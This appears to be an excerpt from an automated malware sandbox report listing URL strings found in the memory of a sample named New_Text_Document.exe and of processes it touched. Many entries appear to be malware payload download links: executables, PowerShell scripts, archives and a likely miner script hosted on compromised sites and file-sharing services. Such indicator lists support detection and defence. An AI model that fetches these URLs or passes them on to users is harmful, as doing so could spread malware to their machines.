                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667352314?hash=zEDslzmi2iqzNrxct8lDgzwviJyAQH0HNgf3d1Rmh6P&dl=fusKtwAsyn4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667363057?hash=EFGn7JDa1yL3d80vbqsB9WZH2w3XpT5V6LPR4VEBzc4&dl=QJPdu5Tzl9C
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667363102?hash=dJDCGwmrBoZY1PDVY1zP2sjc72Oa6DgWg2bulsmIUAw&dl=18MIsPRvpOa
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc52355237_667363160?hash=90eo1ggSa79KsVZPaYy6x9lScec24zb12wdY8O5unQk&dl=m7LLs87D1wJ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc825067038_675082476?hash=kx0ynYYQM06pOMv2PEiPhyxzfJBT3ZEFzztqabfzVS0&dl=XRzs7DBiui
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc825067038_675082536?hash=JsJNjVNU7p2c5J4mBvsKH0I6Z74QyTQSxkCGrWjPFfc&dl=IXEUiPqFux
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc825067038_675083180?hash=PK7Qy7H8qDRHdyITGJa3ZuOZBDM6Vz2NPX7z7XbtkF8&dl=AqIra4TUNe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc825067038_675084444?hash=k5PecVfBQzPaee7oBSXUMlbMI8WyGwsz9sC7fI90JQs&dl=KIXZTpWuxh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc825067038_675085053?hash=YJYrErwiW43od6KFZutTs0JWpIeikSUlZooF2JYaShk&dl=iNtZZjO8B4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc825067038_675086503?hash=VGGdc2da7czLIYn5KDj62g6Y6J0vQK6nZVoPXB2ilXs&dl=asznXpl296
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vollfisioterapia.com.br/wp-content/browser/EngineChromium.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wahaaudit.ps/tmp/index.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://walkindrivetoday.com/fb5djyes.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wallpapercave.com/uwp/uwp4072801.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wallpapercave.com/uwp/uwp4082989.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://waresaislamtrust.com/opiu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://was-col.com/qi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://waterproofingexperts.pk/uttu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.geomegasoft.net/cspwge.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webtv24.org/oi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whitecatcorn.com
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whitecatcorn.com/wp-content/themes/valerielite/updates_installer.exe
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windowswps.oss-cn-hongkong.aliyuncs.com/WPS_Setup.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wizfairtechnologies.com/uc/
                    Source: explorer.exe, 0000000C.00000003.2272914280.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1298597652.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                    Source: explorer.exe, 0000000C.00000000.1312346993.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wordpress.ductai.xyz/file/ps/ni2n.ps1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bHoB
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bL7Q
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bLGW
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bLHb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bMfk
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bOUQ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bOjp
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bPnO
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wtools.io/code/dl/bPx3
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4sync.com/web/directDownload/NRrKch5Y/cmlUXrEx.ec6924e67c8d2c0fb427df950869232a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.TradeInsights.net/images/eqrKn0KrsN2NbhkpbE4fw0X/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alertsecurities.in/stud06_LSsnTJjcP10.bin
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.asterglobal.com/.NEW/.B.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bearware.org/download/IL014/Setup2010u32.exe
                    Source: explorer.exe, 0000000C.00000002.2538450157.000000001103F000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/gvgt7qitlro7h7v9l9848/t.zip?rlkey=n2k6loowa4ocpjr3rt4rgbrgd&dl=1
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q0wq1lha5o0rkgdy9rdr4/m.zip?rlkey=3pobha3zkfchjya3pqer9n6ea&dl=1
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.encurtador.com.br/crDLT
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globallaborsupply.com/wp-admin/eaeUuTop/
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/;
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com:443;
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com:443
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hostingcloud.racing/7991.js
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.idpminic.org/aula/dmi1dfg7n.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.idpminic.org/aula/hiuhehufw.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ingonherbal.com/application/PhEbceg4Tx/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.institut-corps-a-ligne.fr/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.institut-corps-a-ligne.fr/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.institut-corps-a-ligne.fr/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jyotigroup.co.in/admin/images/Tender/dot.exe
